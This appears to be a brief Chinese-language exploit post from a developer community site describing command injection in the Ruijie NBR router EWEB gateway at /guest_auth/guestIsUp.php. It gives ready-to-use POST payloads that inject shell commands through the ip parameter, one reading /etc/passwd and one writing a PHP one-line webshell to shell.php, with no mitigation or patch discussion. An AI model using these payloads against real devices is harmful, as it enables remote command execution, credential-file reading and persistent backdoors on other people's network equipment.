锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取
URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。
我们打开hacker Bar,在Post data 输入 mac=1&ip=192.168.1.1|cat /etc/passwd > test.txt
利用此漏洞我们可以将一句话木马写入shell
Payload :
mac=1&ip=192.168.1.1|echo ‘<?php @eval($_POST[‘bb’]) ?>’ > shell.php
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。